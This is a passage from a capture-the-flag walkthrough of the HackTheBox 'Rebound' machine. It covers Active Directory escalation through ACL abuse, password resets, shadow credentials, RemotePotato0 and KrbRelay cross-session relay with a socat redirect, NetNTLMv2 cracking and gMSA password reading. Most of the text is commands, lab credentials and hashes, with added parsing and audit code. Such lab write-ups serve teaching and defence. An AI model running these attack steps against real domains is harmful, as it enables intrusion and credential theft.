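ObjectDN           : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
ACEType            : ACCESS_ALLOWED_OBJECT_ACE
AccessMask         : ControlAccess
ObjectAceType      : ab721a55-1e2f-11d0-9819-00aa0040529b
SecurityIdentifier : Authenticated Users (S-1-5-11)

ObjectDN           : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
ACEType            : ACCESS_ALLOWED_ACE
AccessMask         : 0x8
SecurityIdentifier : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)

ObjectDN           : CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb
ACEType            : ACCESS_ALLOWED_ACE
ACEFlags           : CONTAINER_INHERIT_ACE, INHERITED_ACE, OBJECT_INHERIT_ACE
AccessMask         : 0xf01ff
SecurityIdentifier : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_ACL):
        print(f)
```

The inherited GenericAll on winrm_svc is exactly what the OU-level grant later in this section produces, so re-running the audit after each change is a cheap way to see what an ACL edit actually propagated.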

Get ServiceMGMT Group

I’ll add the oorend user to the ServiceMGMT group using PowerView commands:

┌──(venv)─(puck㉿kali)-[~/htb/rebound/powerview.py]
└─$ powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb
Logging directory is set to /home/puck/.powerview/logs/rebound-oorend-rebound.htb
[2024-12-06 18:41:55] Channel binding is enforced!
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Add-DomainGroupMember -Identity servicemgmt -Members oorend
[2024-12-06 18:42:23] User oorend successfully added to servicemgmt
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > 

This could also be done with bloodyAD, another tool I’ll use a lot on this box:

┌──(puck㉿kali)-[~/vulnlab/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add groupMember ServiceMGMT oorend
[+] oorend added to ServiceMGMT

After running this (either way), oorend is now in the group.

Get Control over WinRM_SVC

As a member of ServiceMGMT, which has GenericAll over the Service Users OU, I can give oorend GenericAll on that OU directly:

┌──(puck㉿kali)-[~/vulnlab/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' oorend 
[+] oorend has now GenericAll on OU=SERVICE USERS,DC=REBOUND,DC=HTB

Now oorend has FullControl over WinRM_svc:

┌──(venv)─(puck㉿kali)-[~/htb/rebound/powerview.py]
└─$ powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb
Logging directory is set to /home/puck/.powerview/logs/rebound-oorend-rebound.htb
[2024-12-06 18:41:55] Channel binding is enforced!
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Add-DomainGroupMember -Identity servicemgmt -Members oorend
[2024-12-06 18:42:23] User oorend successfully added to servicemgmt
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainObjectAcl -Identity winrm_svc -Where "SecurityIdentifier contains oorend"
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainObjectAcl -Identity winrm_svc -Where "SecurityIdentifier contains oorend"
ObjectDN                    : CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : S-1-5-21-4078382237-1492182817-2568127209-7684
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE, OBJECT_INHERIT_ACE
ActiveDirectoryRights       : FullControl
AccessMask                  : 0xf01ff
InheritanceType             : None
SecurityIdentifier          : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)

(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV >

Access WinRM_SVC

With full control over the Service Users OU, I get the same control over the users in that OU, most interestingly WinRM_SVC. There are many ways to get access as that user from here. I’ll show two.

Change Password

The most obvious way I could think of was to just change the user’s password. This can be done with bloodyAD:

┌──(puck㉿kali)-[~/vulnlab/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb set password winrm_svc 'LeetPassword123!'
[+] Password changed successfully!

And now I have access:

nxc winrm dc01.rebound.htb -u winrm_svc -p 'LeetPassword123!' 
WINRM       10.10.11.231    5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:rebound.htb)
WINRM       10.10.11.231    5985   DC01             [+] rebound.htb\winrm_svc:LeetPassword123! (Pwn3d!)

And can get a shell:

evil-winrm -i dc01.rebound.htb -u winrm_svc -p 'LeetPassword123!'
                                        
Evil-WinRM shell v3.5
 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
 Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> whoami
rebound\winrm_svc

Shadow Cred

A more careful way (and the author’s suggested method) is to use a Shadow Credential, similar to what I showed in Absolute and Outdated.

oxdf@hacky$ certipy shadow auto -username oorend@rebound.htb -password '1GR8t@$$4u' -k -account winrm_svc -target dc01.rebound.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '944a2974-ff0a-2169-27cb-7729bc77e22b'
[*] Adding Key Credential with device ID '944a2974-ff0a-2169-27cb-7729bc77e22b' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '944a2974-ff0a-2169-27cb-7729bc77e22b' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@rebound.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 4469650fd892e98933b4536d2e86e512

That provides the hash for the account, which I can use with Evil-WinRM:

evil-winrm -i dc01.rebound.htb -u winrm_svc -H 4469650fd892e98933b4536d2e86e512
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> 

This method is far superior, in that it’s more stealthy (I haven’t modified the password, only added alternative credentials).

Auth as TBrady

Enumeration

File System

There’s nothing else in winrm_svc’s home directory:

*Evil-WinRM* PS C:\Users\winrm_svc> ls -recurse .

    Directory: C:\Users\winrm_svc

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---         4/8/2023   2:10 AM                Desktop
d-r---        8/31/2023  10:50 PM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos

    Directory: C:\Users\winrm_svc\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        12/6/2024   5:35 AM             34 user.txt


*Evil-WinRM* PS C:\Users\winrm_svc> 

Nothing jumps out as interesting in C:\Program Files or C:\Program Files (x86). The root of the file system is pretty bare; the only unusual thing is the empty Shared folder (presumably the SMB share):

*Evil-WinRM* PS C:\> ls

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         4/7/2023   8:10 AM                PerfLogs
d-r---        8/28/2023   8:26 PM                Program Files
d-----        7/20/2021  12:23 PM                Program Files (x86)
d-----        8/25/2023   2:46 PM                Shared
d-r---         4/8/2023   3:12 AM                Users
d-----        3/17/2024   4:50 PM                Windows

ADCS

There’s nothing interesting with ADCS. Getting certipy working was slightly interesting, so I’ll show that here (though one can skip to the next section without missing anything as far as solving the box).

When I run the standard certipy search to look for vulnerable templates, it fails due to LDAP channel binding (just like above):

oxdf@hacky$ certipy find -dc-ip 10.10.11.231 -ns 10.10.11.231 -u oorend@rebound.htb -p '1GR8t@$$4u' -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[-] Got error: Failed to bind to LDAP. LDAP channel binding or signing is required. Use -scheme ldaps -ldap-channel-binding
[-] Use -debug to print a stacktrace

It is nice enough to tell me two options to add. Trying to run this again raises another error:

oxdf@hacky$ certipy find -dc-ip 10.10.11.231 -ns 10.10.11.231 -u ldap_monitor@rebound.htb -p '1GR8t@$$4u' -vulnerable -stdout -scheme ldaps -ldap-channel-binding             
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[-] Got error: To use LDAP channel binding, install the patched ldap3 module: pip3 install git+https://github.com/ly4k/ldap3
[-] Use -debug to print a stacktrace   

After installing the module, it works:

certipy-ad find -dc-ip 10.10.11.231 -ns 10.10.11.231 -u oorend@rebound.htb -p '1GR8t@$$4u' -vulnerable -stdout -scheme ldaps -ldap-channel-binding
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'rebound-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'rebound-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'rebound-DC01-CA' via RRP
[*] Got CA configuration for 'rebound-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : rebound-DC01-CA
    DNS Name                            : dc01.rebound.htb
    Certificate Subject                 : CN=rebound-DC01-CA, DC=rebound, DC=htb
    Certificate Serial Number           : 42467DADE6281F8846DC3B6CEE24740D
    Certificate Validity Start          : 2023-04-08 13:55:49+00:00
    Certificate Validity End            : 2122-04-08 14:05:49+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : REBOUND.HTB\Administrators
      Access Rights
        ManageCertificates              : REBOUND.HTB\Administrators
                                          REBOUND.HTB\Domain Admins
                                          REBOUND.HTB\Enterprise Admins
        ManageCa                        : REBOUND.HTB\Administrators
                                          REBOUND.HTB\Domain Admins
                                          REBOUND.HTB\Enterprise Admins
        Enroll                          : REBOUND.HTB\Authenticated Users
Certificate Templates                   : [!] Could not find any certificate templates

Once it is working, though, it fails to find any vulnerable templates.

Processes

Looking at the running processes, there’s something interesting:

*Evil-WinRM* PS C:\Users\winrm_svc> get-process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    408      33    12768      21540              2760   0 certsrv
    470      19     2288       5564               392   0 csrss
    268      16     2224       5232               504   1 csrss
    357      15     3476      14940              5704   1 ctfmon
    394      33    16268      25048              2844   0 dfsrs
    158       8     1936       6400              2264   0 dfssvc
    289      14     3880      13824              3928   0 dllhost
   5379    5807    69404      71476              2852   0 dns
    601      26    24416      53876              1008   1 dwm
   1503      59    25524      89508               972   1 explorer
     53       6     1504       4724              2728   0 fontdrvhost
     53       6     1784       5444              2736   1 fontdrvhost
      0       0       56          8                 0   0 Idle
    142      13     2164       6028              2880   0 ismserv
   2393     186    51300      69544               652   0 lsass
    483      35    51952      65720              2796   0 Microsoft.ActiveDirectory.WebServices
    254      13     2876      10708              4404   0 msdtc
    646      92   299852     318340              3036   0 MsMpEng
      0      14      384      10332                88   0 Registry
    236      12     2776      17220              2552   1 RuntimeBroker
    230      12     2280      12924              5540   1 RuntimeBroker
    293      15     5560      16988              6136   1 RuntimeBroker
    681      33    20184      73792              5968   1 SearchUI
    276      12     2936      12588              5904   0 SecurityHealthService
    621      14     5552      13364               632   0 services
    777      30    17136      60496              2004   1 ShellExperienceHost
    456      17     4888      25048              2608   1 sihost
     53       3      520       1220               280   0 smss
    130       7     1292       6096                68   0 svchost
    286      13     4248      11632               336   0 svchost
    216      12     1980      10132               712   0 svchost
    152       9     1696       6880               772   0 svchost
--snip--
    118       8     1608       6156              6020   0 svchost
   1761       0      192        160                 4   0 System
    182      11     2128      11460              2892   1 taskhostw
    213      16     2516      11308              3844   0 vds
    174      12     2948      11012              2996   0 VGAuthService
    148       8     1700       7444              3016   0 vm3dservice
    141       9     1804       7956              3408   1 vm3dservice
    142       9     1812       8040              6064   1 vm3dservice
    240      18     5116      15740              2888   1 vmtoolsd
    395      23     9820      22784              3024   0 vmtoolsd
    172      11     1416       7116               496   0 wininit
    283      12     2588      12944               560   1 winlogon
    389      19    11480      22076              3716   0 WmiPrvSE
    791      27    56684      73940       0.69   1488   0 wsmprovhost
    976      26    56616      73796       0.36   4416   0 wsmprovhost


*Evil-WinRM* PS C:\Users\winrm_svc> 

There’s a bunch of processes in session 1. Typically on HTB machines when no one is logged in, I’ll see LogonUI and a couple other processes, but here explorer is running, and it looks like someone is actually logged in.

Session

qwinsta is the command to display information about sessions on the host, but it fails:

*Evil-WinRM* PS C:\> qwinsta *
qwinsta.exe : No session exists for *
    + CategoryInfo          : NotSpecified: (No session exists for *:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

I came across this Security Stack Exchange post, which doesn’t explain why, but shows that RunasCs.exe makes it work (and this author is likely trying to solve Rebound). I’ll download the latest release and upload it to Rebound:

*Evil-WinRM* PS C:\Users\winrm_svc> cd c:\windows\tasks
*Evil-WinRM* PS C:\windows\tasks> upload RunasCs.exe
                                        
Info: Uploading /home/puck/htb/rebound/RunasCs.exe to C:\windows\tasks\RunasCs.exe
                                        
Data: 64852 bytes of 64852 bytes copied
                                        
Info: Upload successful!

 

Not only does it work, but it shows the TBrady user is logged in:

*Evil-WinRM* PS C:\windows\tasks> .\RunasCs.exe x x qwinsta -l 9
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
>services                                    0  Disc
 console           tbrady                    1  Active
*Evil-WinRM* PS C:\windows\tasks> 

 

BloodHound

TBrady has ReadGMSAPassword on the Delegator$ account, which seems like it might be interesting:

 

It seems like that’s my current target.

Cross Session Relay

I’m going to abuse TBrady’s logged-in session by triggering an authentication back to my box and relaying it to dump a hash. I did something similar in Absolute, but there I got the administrator account, which allowed me to just add an admin user and be done. Here I’ll be targeting the TBrady user, so what I can get via relay is more limited.

There’s a couple ways to do this:

  • RemotePotato0
  • KrbRelay

I’ll show both.

RemotePotato0

RemotePotato0 is a tool that:

It abuses the DCOM activation service and triggers an NTLM authentication of any user currently logged on in the target machine. It is required that a privileged user is logged on the same machine (e.g. a Domain Admin user). Once the NTLM type1 is triggered we set up a cross protocol relay server that receives the privileged type1 message and relays it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end you can set up a further relay node (e.g. ntlmrelayx) or relay directly to a privileged resource. RemotePotato0 also allows grabbing and stealing NTLMv2 hashes of every user logged on a machine.

Here, since I’ll be targeting a non-admin user, I’ll focus on the hash grab. I’ll upload the latest release:

*Evil-WinRM* PS C:\windows\tasks> upload RemotePotato0.exe
 Info: Uploading /home/puck/htb/rebound/RemotePotato0.exe to C:\windows\tasks\RemotePotato0.exe
 Data: 235520 bytes of 235520 bytes copied
 Info: Upload successful!

 

To run it, I’ll use the following options:

  • -m 2 – method 2, “Rpc capture (hash) server + potato trigger”
  • -s 1 – the session of the user to target
  • -x 10.10.14.6 – set the rogue Oxid resolver IP to mine
  • -p 9999 – the port I’ll relay back to the host; not necessary since this is default, but good to explicitly state

These kinds of RPC connections will only target TCP 135. Since I can’t listen on TCP 135 on Rebound (the legitimate RPC service is already listening there), I’ll have the exploit target my host, and then forward that back to RemotePotato0 on 9999. I’ll run socat on my box: sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999. So the traffic will hit my host on 135 and go back to Rebound on 9999, where RemotePotato0 is listening.

When I run this, it dumps a NetNTLMv2 hash for TBrady:

*Evil-WinRM* PS C:\programdata> .\RemotePotato0.exe -m 2 -s 1 -x 10.10.14.6 -p 9999
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on (null) to your victim machine on port 9999
[*] Example Network redirector:
        sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP::9999
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] Spawning COM object in the session: 1
[*] Calling StandardGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] RPC relay server listening on port 9997 ...
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written: 102 bytes
[*] ServerAlive2 RPC Call
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to RPC Server 127.0.0.1 on port 9999
[+] User hash stolen!

NTLMv2 Client   : DC01
NTLMv2 Username : rebound\tbrady
NTLMv2 Hash     : tbrady::rebound:2c38764642ea2aeb:216c7642dd3e5224eed40910c4aff73f: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

KrbRelay

I’ll clone KrbRelay to my Windows VM and compile it in Visual Studio (just like in Absolute). I’ll upload it to Rebound:

*Evil-WinRM* PS C:\windows\tasks> upload KrbRelay.exe
                                        
Info: Uploading /home/puck/htb/rebound/KrbRelay.exe to C:\windows\tasks\KrbRelay.exe
                                        
Data: 2158592 bytes of 2158592 bytes copied
                                        
Info: Upload successful!

I’ll run it just like the example in the README.md under NTLM, except I’ll use RunasCs.exe to get into a /netonly-like session, just like with qwinsta:

*Evil-WinRM* PS C:\windows\tasks> .\RunasCs.exe x x -l 9 "C:\windows\tasks\KrbRelay.exe -session 1 -clsid 0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4 -ntlm"
[*] Auth Context: rebound\tbrady
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\windows\tasks\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAACXNrfG2afFtt+mmOcTveN2AnAAAAwH//+LiMS0DChaaCIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing cross-session authentication
[*] Using CLSID: 0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4
[*] Spawning in session 1
[*] NTLM1
4e544c4d535350000100000097b218e2070007002c00000004000400280000000a0063450000000f444330315245424f554e44
[*] NTLM2
4e544c4d53535000020000000e000e003800000015c299e25e3117d193c70ede000000000000000086008600460000000a0063450000000f7200650062006f0075006e00640002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e0068007400620007000800b1725d661648db010000000000000000000000000000000000000000000000005070da111f0001000b010000
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, ReplayDetect, SequenceDetect, UseDceStyle, Connection, AllowNonUserLogons
[*] NTLM3
tbrady::rebound:5e3117d193c70ede:07a0ea4a55e219f5845563c9e62acce4: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
System.UnauthorizedAccessException: Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
   at KrbRelay.IStandardActivator.StandardGetInstanceFromIStorage(COSERVERINFO pServerInfo, Guid& pclsidOverride, IntPtr punkOuter, CLSCTX dwClsCtx, IStorage pstg, Int32 dwCount, MULTI_QI[] pResults)
   at KrbRelay.Program.Main(String[] args)
*Evil-WinRM* PS C:\windows\tasks>


It also gives a NetNTLMv2 hash.

Crack Hash

Regardless of how I collected the NetNTLMv2 hash (really more a challenge / response than a hash), I can save it to a file and give it to hashcat:

hashcat tbrady_hash3 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

TBRADY::rebound:5e3117d193c70ede:07a0ea4a55e219f5845563c9e62acce4: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:543BOMBOMBUNmanda
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: TBRADY::rebound:5e3117d193c70ede:07a0ea4a55e219f584...000000
Time.Started.....: Fri Dec  6 20:43:55 2024 (5 secs)


The hash cracks as “543BOMBOMBUNmanda”.
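As an added example (mine, not part of the original writeup and not KrbRelay’s or hashcat’s code), here is a small Python parser for the two NTLM messages KrbRelay printed above. It decodes the NEGOTIATE flags and version, then the server challenge and the AV_PAIR target info in the CHALLENGE, and finally splits a NetNTLMv2 line in hashcat’s mode 5600 layout to show that its third field is that same server challenge, which is why this is a challenge/response rather than a stored hash. The hex is the page’s own output; the CHALLENGE is cut at its AV_PAIR terminator because the tool dumped trailing buffer bytes, and the blob at the end of the NetNTLMv2 line is a constructed placeholder since the page’s was truncated.

```python
"""Decode NTLM NEGOTIATE/CHALLENGE messages and relate them to a NetNTLMv2 line.

Field layouts follow MS-NLMP; this is an added, self-contained example.
"""
import struct
from datetime import datetime, timedelta, timezone

# Subset of NEGOTIATE flags (MS-NLMP 2.2.2.5).
NEGOTIATE_FLAGS = {
    0x00000001: "UNICODE", 0x00000004: "REQUEST_TARGET", 0x00000010: "SIGN",
    0x00000200: "NTLM", 0x00008000: "ALWAYS_SIGN", 0x00010000: "TARGET_TYPE_DOMAIN",
    0x00080000: "EXTENDED_SESSIONSECURITY", 0x00800000: "TARGET_INFO",
    0x02000000: "VERSION", 0x20000000: "128", 0x40000000: "KEY_EXCH", 0x80000000: "56",
}
# AV_PAIR ids (MS-NLMP 2.2.2.1).
AV_IDS = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
          4: "DnsDomainName", 5: "DnsTreeName", 7: "Timestamp"}

# NEGOTIATE and CHALLENGE hex as printed by KrbRelay on this page. The CHALLENGE is
# cut at its MsvAvEOL terminator: the tool dumped trailing buffer bytes past the
# 204-byte message.
NEGOTIATE_HEX = ("4e544c4d53535000" "01000000" "97b218e2" "070007002c000000"
                 "0400040028000000" "0a0063450000000f" "44433031" "5245424f554e44")
CHALLENGE_HEX = (
    "4e544c4d53535000" "02000000" "0e000e0038000000" "15c299e2" "5e3117d193c70ede"
    "0000000000000000" "8600860046000000" "0a0063450000000f"
    "7200650062006f0075006e006400"                                # TargetName "rebound"
    "02000e00" "7200650062006f0075006e006400"                     # NbDomainName
    "01000800" "4400430030003100"                                 # NbComputerName
    "04001600" "7200650062006f0075006e0064002e00680074006200"     # DnsDomainName
    "03002000" "64006300300031002e007200650062006f0075006e0064002e00680074006200"
    "05001600" "7200650062006f0075006e0064002e00680074006200"     # DnsTreeName
    "07000800" "b1725d661648db01"                                 # Timestamp (FILETIME)
    "00000000")                                                   # MsvAvEOL
# Constructed NetNTLMv2 line: the page's user, domain, challenge and NTProofStr
# with a placeholder blob (the real blob was truncated on the page).
SAMPLE_NETNTLMV2 = ("tbrady::rebound:5e3117d193c70ede:07a0ea4a55e219f5845563c9e62acce4:"
                    "0101000000000000b1725d661648db01")


def flag_names(flags):
    return [name for bit, name in sorted(NEGOTIATE_FLAGS.items()) if flags & bit]


def filetime_to_datetime(ft):
    """FILETIME is 100 ns ticks since 1601-01-01 UTC."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def _field(buf, off):
    """Read an NTLM Fields structure (Len, MaxLen, BufferOffset) and return its bytes."""
    length, _, offset = struct.unpack_from("<HHI", buf, off)
    return buf[offset:offset + length]


def parse_negotiate(msg):
    assert msg[:8] == b"NTLMSSP\x00" and struct.unpack_from("<I", msg, 8)[0] == 1
    return {
        "flags": flag_names(struct.unpack_from("<I", msg, 12)[0]),
        "domain": _field(msg, 16).decode("ascii"),        # OEM strings in NEGOTIATE
        "workstation": _field(msg, 24).decode("ascii"),
        "version": "%d.%d build %d" % struct.unpack_from("<BBH", msg, 32),
    }


def parse_challenge(msg):
    assert msg[:8] == b"NTLMSSP\x00" and struct.unpack_from("<I", msg, 8)[0] == 2
    info, off, av_pairs = _field(msg, 40), 0, {}
    while True:
        av_id, av_len = struct.unpack_from("<HH", info, off)
        off += 4
        if av_id == 0:                                   # MsvAvEOL
            break
        value = info[off:off + av_len]
        off += av_len
        if av_id == 7:
            value = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:
            value = value.decode("utf-16-le")
        av_pairs[AV_IDS.get(av_id, "Av%d" % av_id)] = value
    return {
        "flags": flag_names(struct.unpack_from("<I", msg, 20)[0]),
        "target_name": _field(msg, 12).decode("utf-16-le"),
        "server_challenge": msg[24:32].hex(),
        "target_info": av_pairs,
    }


def split_netntlmv2(line):
    """hashcat mode 5600 layout: user::domain:server_challenge:NTProofStr:blob."""
    user, _, domain, challenge, proof, blob = line.split(":", 5)
    return {"user": user, "domain": domain, "server_challenge": challenge,
            "ntproofstr": proof, "blob": blob}


def demo():
    neg = parse_negotiate(bytes.fromhex(NEGOTIATE_HEX))
    chal = parse_challenge(bytes.fromhex(CHALLENGE_HEX))
    resp = split_netntlmv2(SAMPLE_NETNTLMV2)
    # NTProofStr is HMAC-MD5 over this server challenge and the blob, keyed by the
    # NTLMv2 hash: without both values the line can be neither verified nor cracked.
    return neg, chal, resp, chal["server_challenge"] == resp["server_challenge"]


if __name__ == "__main__":
    for item in demo():
        print(item)
```

Run stand-alone it prints the three decoded structures. The CHALLENGE’s AV_PAIR timestamp decodes to the evening of 6 December 2024 UTC, matching when this capture was taken, and the DnsComputerName / NbComputerName pairs identify the server that issued the challenge, which is what a reviewer uses to tell a relayed authentication apart from a direct one when going through a capture.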

Auth Check

These creds work for SMB and LDAP, but not WinRM:

nxc smb dc01.rebound.htb -u tbrady -p 543BOMBOMBUNmanda 
SMB         10.10.11.231    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.231    445    DC01             [+] rebound.htb\tbrady:543BOMBOMBUNmanda 
                                                                                                                     
nxc winrm dc01.rebound.htb -u tbrady -p 543BOMBOMBUNmanda 
WINRM       10.10.11.231    5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:rebound.htb)
WINRM       10.10.11.231    5985   DC01             [-] rebound.htb\tbrady:543BOMBOMBUNmanda
                                                                                                                     
nxc ldap dc01.rebound.htb -u tbrady -p 543BOMBOMBUNmanda -k
SMB         dc01.rebound.htb 445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS       dc01.rebound.htb 636    DC01             [+] rebound.htb\tbrady 


The lack of WinRM isn’t surprising, as TBrady isn’t in any group that would enable it:

Auth as delegator$

Recover Hash

TBrady has ReadGMSAPassword over the delegator$ account. I’ll show three different tools that read the gMSA managed password and return the NTLM hash of delegator$.

bloodyAD

I already noted above that TBrady has ReadGMSAPassword on Delegator$. This page from Hacker Recipes has a bunch of ways to do it. I’ll use bloodyAD to dump it:

python3 bloodyAD.py -d rebound.htb -u tbrady -p 543BOMBOMBUNmanda --host dc01.rebound.htb get object 'delegator$' --attr msDS-ManagedPassword

distinguishedName: CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:4ba33add1108fe560429fc27a1bcab6b
msDS-ManagedPassword.B64ENCODED: NikXxFjQpBQrJqGAoSwQfOJIcS4wKNsur+HWUgv8o4fs6tlKg8aqiw1hINqtW2YwYl8Z1aO6AMsosv4kx81YKfH7AuhmB+vzCKB4VyXKmtEx390JWrBXHcNKcxlygf8Urs3g+RNlodOEx0FDGsoFRZ1Lq1nJetOTSLVY/sVm4q/jHbWxsmCsXenE6XK5a8z5q3yD6Mx4Ho3CdnVB110Ac24SxV1t+tKPsZ1Q1bbhhF7bf37jTiz9v6hsSZVNWgmxfDPg02n1oaViqh+XRdZnLtEs6i5O3HiAEtWYJdjEm0Qc2DCSupQRA5HSeZ51mEauBRRHyUhIjZeAuGckCFyYew==

GMSAPasswordReader.exe

Alternatively, the BloodHound documentation suggests GMSAPasswordReader. I’ll clone the repo and build it in my Windows VM, and then upload it to Rebound:

*Evil-WinRM* PS C:\windows\tasks> upload GMSAPasswordReader.exe
 Info: Uploading /home/puck/htb/rebound/GMSAPasswordReader.exe to C:\windows\tasks\GMSAPasswordReader.exe
 Data: 140628 bytes of 140628 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\windows\tasks>

Running it as TBrady should work (though it didn’t for me):

*Evil-WinRM* PS C:\ProgramData> .\RunasCs.exe tbrady 543BOMBOMBUNmanda -l 2 "\programdata\GMSAPasswordReader.exe --accountname delegator$"
[*] Warning: The logon for user 'tbrady' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

netexec

netexec can get the NTLM for the delegator$ account as well:

nxc ldap rebound.htb -u tbrady -p 543BOMBOMBUNmanda -k --gmsa 
SMB         rebound.htb     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS       rebound.htb     636    DC01             [+] rebound.htb\tbrady:543BOMBOMBUNmanda 
